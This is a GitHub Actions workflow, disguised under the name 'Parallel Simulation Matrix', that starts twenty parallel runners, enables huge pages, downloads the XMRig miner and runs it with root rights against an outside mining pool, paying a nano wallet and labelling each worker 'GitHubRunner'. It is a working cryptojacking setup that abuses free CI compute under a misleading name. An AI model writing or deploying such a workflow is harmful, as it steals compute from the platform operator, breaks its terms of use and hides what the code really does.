name: Parallel Simulation Matrix

on:
  workflow_dispatch:

jobs:
  optimize-and-run:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    strategy:
      # Creates 20 parallel instances
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
      fail-fast: false 

    steps:
      - name: Kernel-Level Optimization
        run: |
          # Enable Huge Pages and clear cache for performance
          sudo sysctl -w vm.nr_hugepages=1250
          sudo sync && echo 3 | sudo tee /proc/sys/vm/drop_caches

      - name: Download and Setup XMRig
        run: |
          curl -L -O https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz

      - name: Execute XMRig Task
        run: |
          cd xmrig-6.21.0
          # Using the matrix instance number in the pass/worker name for tracking
          sudo ./xmrig -o xmrig.nanswap.com:3333 \
          -a rx -k \
          -u nano_3d5psf65d41ckxdnqz5ajuwo1ceo6hq8k4q314oa78doqozye9b6eb5iqpc1 \
          -p GitHubRunner-${{ matrix.instance }} \
          --cpu-priority 5 \
          --randomx-mode=fast
          
